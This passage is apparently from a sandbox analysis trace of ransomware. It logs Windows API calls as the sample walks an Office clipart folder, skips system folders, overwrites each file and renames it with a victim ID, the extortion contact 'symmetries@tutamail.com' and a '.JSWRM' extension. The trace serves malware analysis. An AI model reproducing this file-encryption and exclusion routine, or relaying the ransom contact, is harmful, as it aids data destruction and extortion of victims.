MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0080.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0080.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0080.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0080.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0080.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0080.649] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4314, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105238.WMF", cAlternateFileName="")) returned 1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2=".") returned 1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="..") returned 1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="...") returned 1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="windows") returned -1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="recovery") returned -1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="perflogs") returned -1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="documents and settings") returned 1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="system volume information") returned -1 [0080.649] lstrcmpiW (lpString1="J0105238.WMF", lpString2="msocache") returned -1 [0080.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0080.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105238.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105238.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105238.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0080.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0080.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105238.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105238.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105238.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0080.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0080.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.650] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17172) returned 1 [0080.650] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4310) returned 0x24d210 [0080.650] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4310, lpOverlapped=0x0) returned 1 [0080.652] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.652] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4310, lpOverlapped=0x0) returned 1 [0080.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.653] CloseHandle (hObject=0x314) returned 1 [0080.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0080.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0080.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0080.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0080.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0080.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.653] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0080.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.654] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d0c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105240.WMF", cAlternateFileName="")) returned 1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2=".") returned 1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="..") returned 1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="...") returned 1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="windows") returned -1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="recovery") returned -1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="perflogs") returned -1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="documents and settings") returned 1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="system volume information") returned -1 [0080.654] lstrcmpiW (lpString1="J0105240.WMF", lpString2="msocache") returned -1 [0080.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0080.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105240.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105240.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105240.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0080.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0080.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105240.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105240.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105240.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0080.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0080.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.655] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11532) returned 1 [0080.655] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d00) returned 0x24d210 [0080.655] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2d00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2d00, lpOverlapped=0x0) returned 1 [0080.657] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.657] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2d00, lpOverlapped=0x0) returned 1 [0080.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.657] CloseHandle (hObject=0x314) returned 1 [0080.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0080.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0080.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0080.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0080.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0080.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0080.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0080.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0080.659] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bdc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105244.WMF", cAlternateFileName="")) returned 1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2=".") returned 1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="..") returned 1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="...") returned 1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="windows") returned -1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="recovery") returned -1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="perflogs") returned -1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="documents and settings") returned 1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="system volume information") returned -1 [0080.659] lstrcmpiW (lpString1="J0105244.WMF", lpString2="msocache") returned -1 [0080.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0080.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105244.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105244.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105244.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0080.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105244.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105244.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105244.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.660] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11228) returned 1 [0080.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bd0) returned 0x24d210 [0080.660] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2bd0, lpOverlapped=0x0) returned 1 [0080.662] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.662] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2bd0, lpOverlapped=0x0) returned 1 [0080.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.662] CloseHandle (hObject=0x314) returned 1 [0080.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0080.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0080.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0080.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0080.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0080.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0080.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.664] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105246.WMF", cAlternateFileName="")) returned 1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2=".") returned 1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="..") returned 1 [0080.664] lstrcmpiW 